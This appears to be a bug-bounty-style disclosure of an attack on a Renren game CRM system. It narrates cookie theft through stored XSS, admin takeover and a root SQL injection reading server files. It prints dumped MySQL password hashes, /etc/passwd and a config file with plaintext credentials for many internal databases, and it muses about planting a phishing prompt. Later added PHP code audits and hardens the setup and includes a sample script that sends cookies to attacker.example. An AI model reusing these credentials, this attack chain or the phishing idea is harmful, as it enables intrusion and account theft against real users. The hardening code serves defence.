XSS steals cookies, and there is an SQL injection as well; its privileges are very broad, load_file('/etc/passwd') works directly.
Looks like wan.renren.com can be taken.
http://wan.renren.com/service.shtml
First, I picked a customer service agent here at random and inserted XSS code when submitting the form, in the name field I think (I forget), and then the cookies came in.
Then into the backend, as a senior administrator no less.
Path disclosure (http://rrcrm.data.io8.org/lib/):
/data/web/crm.imop.com/
The injection only works with valid (logged-in) cookies.
Resp. Time(avg): 149 ms
Current User: root@localhost
Sql Version: 5.1.38-community-log
Current DB: CRM
System User: root@localhost
Host Name: TJHY248-160.opi.com
Installation dir: /
DB User & Pass: root:053a9bf72434f7f8:localhost
root:*84FC659A33D523EACAFFDD441B0D3FB5A114E791:TJHY248-160.opi.com
msgweb:32ce979f1810450d:%
gamesum:*04ED80791E1E83935FCFB04DB251B8923CA52276:10%
stat:532a371916879d65:%
gc_imop:*543E075F9BD62E4B2C39F12CD7BDDAA75A6E8A40:10.22.225.%
webcrm:63e483b832b5e91a:%
replication:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:10.%
wangkun:27df606e7932e98c:%
zhenyu.shang:658d4f1d5d32391d:10.%
kettle:565491d704013245:%
Data Bases: information_schema
CRM
CRMUSER
binlogs
mysql
test
testcrm
tongyongcrm
user_classfy
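Two checks worth running on the dump above, as an added example (not code from the report or from the CRM application). The first classifies each "user:hash:host" line by hash format: the dump mixes 16-hex pre-4.1 hashes, which are only 64 bits and cheap to brute-force offline, with '*'-prefixed SHA1 hashes, and root@localhost itself still carries the old format on a 5.1 server; it also flags wildcard hosts such as '%' and '10.%'. The second queries a live server for the settings that made load_file() possible: the account the web app connects as (root holds FILE), secure_file_priv (empty by default on 5.1, meaning no path restriction), and any other account holding FILE or SUPER. The live part assumes MySQL 5.x with the mysql.user.Password column (true for 5.1.38); the DSN and credentials are placeholders.

```php
<?php
// Added example; not code from the report or from the CRM application.
//  1. classify each "user:hash:host" dump line by MySQL hash format;
//  2. audit a live server for what let load_file() succeed.
// Assumes MySQL 5.x with mysql.user.Password (as on 5.1.38); DSN is a placeholder.

function classify_mysql_hash(string $hash): string
{
    if ($hash === '') {
        return 'EMPTY: login without a password';
    }
    if (preg_match('/^\*[0-9A-F]{40}$/i', $hash)) {
        return 'native: *SHA1(SHA1(pw)), 4.1+ format';
    }
    if (preg_match('/^[0-9a-f]{16}$/i', $hash)) {
        return 'pre-4.1: 64-bit hash, trivially brute-forced offline';
    }
    return 'unknown format';
}

function audit_dump(array $lines): array
{
    $out = [];
    foreach ($lines as $line) {
        // Format printed by the injection tool: user:hash:host
        [$user, $hash, $host] = explode(':', $line, 3);
        $out[] = [
            'account'   => "$user@$host",
            'hash_kind' => classify_mysql_hash($hash),
            // '%' or a prefix like '10.%' admits the account from any matching address
            'wide_host' => substr($host, -1) === '%',
        ];
    }
    return $out;
}

function audit_live(PDO $db): array
{
    $r = [];
    // The application's own account; root makes every other check moot.
    $r['current_user'] = $db->query('SELECT CURRENT_USER()')->fetchColumn();
    // '' (5.1 default): load_file()/INTO OUTFILE may touch any path mysqld can read;
    // a directory confines them; NULL disables them. Read-only at runtime, set in my.cnf.
    $r['secure_file_priv'] = $db->query('SELECT @@GLOBAL.secure_file_priv')->fetchColumn();
    // Every account that can read server files or bypass limits.
    $r['file_or_super'] = $db->query(
        "SELECT GRANTEE, PRIVILEGE_TYPE FROM information_schema.USER_PRIVILEGES
          WHERE PRIVILEGE_TYPE IN ('FILE', 'SUPER')"
    )->fetchAll(PDO::FETCH_ASSOC);
    // Accounts still on the pre-4.1 format or with no password at all.
    $r['weak_or_empty_hashes'] = $db->query(
        "SELECT User, Host FROM mysql.user WHERE LENGTH(Password) = 16 OR Password = ''"
    )->fetchAll(PDO::FETCH_ASSOC);
    return $r;
}

// Three lines copied from the "DB User & Pass" dump above.
$sample = [
    'root:053a9bf72434f7f8:localhost',
    'root:*84FC659A33D523EACAFFDD441B0D3FB5A114E791:TJHY248-160.opi.com',
    'webcrm:63e483b832b5e91a:%',
];
print_r(audit_dump($sample));

// Live check; replace the placeholder DSN and credentials before running.
// $db = new PDO('mysql:host=127.0.0.1;dbname=mysql', 'auditor', '<placeholder>');
// print_r(audit_live($db));
```

Remediation for what the live audit reports is `REVOKE FILE ON *.* FROM 'webcrm'@'%';` for each flagged account, `secure-file-priv=/var/lib/mysql-files` (or an empty-directory equivalent) in my.cnf, and re-setting the password of every 16-hex account with old_passwords=0 so it gets the 41-character format.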
Next, look for passwd:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
zabbix:x:500:500:Zabbix User:/home/zabbix:/bin/false
mysql:x:100:103:MySQL server:/var/lib/mysql:/bin/bash
Then the MySQL and other database configuration:
/data/web/crm.imop.com/config.inc.php
<?php
/**
* Database connection parameters
*/
$cfg['sqlserv'] = 'localhost';
$cfg['sqluser'] = 'root';
$cfg['sqlpass'] = 'crm123li';
$cfg['sqllibr'] = 'CRM';
/**
* Page TITLE
*/
$cfg['title'] = 'CRM管理系统2011';
/**
* Template paths
*/
$cfg['template'] = 'templates';
$cfg['template_c'] = 'templates_c';
$color = array("black" , "blue" , "red" , "green" , "#999933" , "#4CD2D2" , "#FC9B39" , "#4B7994" , "#8300CA" , "#009C9C" , "#B24194" , "yellow" , "#11cccc" , "#77dd22" , "#444444", "#154544" , "#dd00CA" , "#cc9C9C" , "#aa4194" , "#bbcc33" , "#77aacc" , "#dd44dd" , "#211144" , "#98FF44","black" , "blue" , "red" , "green" , "#999933" , "#4CD2D2" , "#FC9B39" , "#4B7994" , "#8300CA" , "#009C9C" , "#B24194" , "yellow" , "#11cccc" , "#77dd22" , "#444444", "#154544" , "#dd00CA" , "#cc9C9C" , "#aa4194" , "#bbcc33" , "#77aacc" , "#dd44dd" , "#211144" , "#98FF44");
define('CRM_HOST','localhost:3306');
define('CRM_USER','root');
define('CRM_PWD','crm123li');
define('CRM_DB','CRM');
define('MARKET_ALL_HOST','sg.data.io8.org:3306');
define('MARKET_ALL_USER','stat');
define('MARKET_ALL_PWD','petnewstatZL123');
define('MARKET_ALL_DB','market_all');
//define("GAME_HOST","10.30.32.126:3306");
define("GAME_HOST","10.22.222.23");
define("GAME_USER","webcrm");
define("GAME_PWD","webcrm123");
define("GAME_DB","GAMEUSER");
define("GAMEPAY_DB","GAMEPAY");//backend accounting
define("MGC_HOST","10.22.225.87:3306");
define("MGC_USER","webcrm");
define("MGC_PWD","webcrm123");
define("MGC_DB","GAMEUSER");
define("SSWEB_HOST","10.22.225.61:5003");
define("SSWEB_USER","webcrm");
define("SSWEB_PWD","webcrm123");
define("SSWEB_DB","ss_web");
//define("SSGC_HOST","10.22.225.22:4001");
//define("SSGC_USER","webcrm");
//define("SSGC_PWD","webcrm123");
//define("SSGC_DB","GAMEUSER");
define("SSGC_HOST","10.22.238.140:3306");
define("SSGC_USER","webcrm");
define("SSGC_PWD","webcrm123");
define("SSGC_DB","GAMEUSER");
define("SSCRM_HOST",'localhost:3306');
define("SSCRM_USER",'webcrm');
define("SSCRM_PWD",'webcrm123');
define("SSCRM_DB",'SSCRM');
//define("SHOP_HOST","10.22.225.34:3306");
define("SHOP_HOST","10.30.36.201");
define("SHOP_USER","webcrm");
define("SHOP_PWD","webcrm123");
define("SHOP_DB","mop_shop");
//Xiaonei center
define("XIAONEI_HOST","10.22.225.115:3306");
define("XIAONEI_USER","webcrm");
define("XIAONEI_PWD",'webcrm123');
define("XIAONEI_DB","XNTSGAMELOCALPAY");
//accounting DB
define("SUM_HOST","crmdb.data.io8.org");
define("SUM_USER","webcrm");
define("SUM_PWD",'webcrm123');
define("SUM_DB","CRMUSER");
//message server db
define("MSG_HOST","10.30.32.95:3306");
define("MSG_USER","webcrm");
define("MSG_PWD",'webcrm123');
define("MSG_DB","IMOPMSG");
//pagination settings
define("PAGE_MAX", 20);
define("PAGE_NUM", 10);
?>
So many of them.
Incidentally, found FCKeditor along the way:
http://cms-na.tech.io8.org/fckeditor/
http://rrcrm.data.io8.org/lib/FCKeditor/
Also, once in the backend you can edit the announcements, with no filtering at all; if I put up a Basic Auth phishing prompt there, heh, I might even get hold of some game accounts.
Fix:
Filter XSS, then restrict administrator privileges, and step up training.
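Concretely, here is what that recommendation looks like in code, as an added example (the CRM application's own code is not shown in the report, and this is not it). The tickets table, customer_name column, crm_app account and DSN are assumptions; PHP 7.3+ is assumed for the array form of session_set_cookie_params. It places the vulnerable shape of both findings beside the hardened one: prepared statements instead of string concatenation, output encoding at render time instead of input "filtering", HttpOnly/Secure session cookies so a stored script cannot read the admin session, and a schema-scoped database account without FILE in place of root, so load_file() fails even if an injection gets through.

```php
<?php
// Added example, not code from the report or the CRM application.
// Table/column names, the crm_app account and the DSN are assumptions.
declare(strict_types=1);

// Vulnerable shape: untrusted input concatenated into SQL, then echoed raw
// into the admin page. Both bugs the report found have this form.
function save_ticket_vulnerable(PDO $db, string $name, string $body): void
{
    $db->exec("INSERT INTO tickets (customer_name, body) VALUES ('$name', '$body')");
}
function render_ticket_vulnerable(array $row): string
{
    return "<td>{$row['customer_name']}</td><td>{$row['body']}</td>";
}

// Hardened: a prepared statement keeps data out of the SQL grammar entirely.
function save_ticket(PDO $db, string $name, string $body): void
{
    $stmt = $db->prepare('INSERT INTO tickets (customer_name, body) VALUES (:name, :body)');
    $stmt->execute([':name' => $name, ':body' => $body]);
}

// Encode on output for the HTML-text context. ENT_QUOTES also stops an
// attribute break-out; ENT_SUBSTITUTE avoids returning '' on invalid UTF-8,
// which would silently drop the whole field.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}
function render_ticket(array $row): string
{
    return '<td>' . h($row['customer_name']) . '</td><td>' . h($row['body']) . '</td>';
}

// Admin session: with HttpOnly the stolen cookie would have been unreadable
// from script; Secure keeps it off plain HTTP; SameSite limits cross-site reuse.
function start_admin_session(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    session_start();
}

// The app should connect as an account confined to its own schema, not root.
// Provision once as DBA (placeholder password):
//   CREATE USER 'crm_app'@'localhost' IDENTIFIED BY '<placeholder>';
//   GRANT SELECT, INSERT, UPDATE, DELETE ON CRM.* TO 'crm_app'@'localhost';
// No FILE, no SUPER, nothing on mysql.*: load_file() then fails even if an
// injection slips past the code above.
function connect_crm(): PDO
{
    return new PDO('mysql:host=localhost;dbname=CRM;charset=utf8mb4', 'crm_app', '<placeholder>', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // server-side prepares, not client-side quoting
    ]);
}

// Offline demonstration of the output encoding with a constructed payload of
// the kind the report believes went into the name field.
$payload = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>';
echo render_ticket_vulnerable(['customer_name' => $payload, 'body' => 'hi']), "\n";
echo render_ticket(['customer_name' => $payload, 'body' => 'hi']), "\n";
```

Running it with `php example.php` prints the payload unchanged on the first line and as `&lt;script&gt;...&lt;/script&gt;` on the second; only the second is safe to place in a page. The two database functions are not called, since they need a live server and the placeholder account.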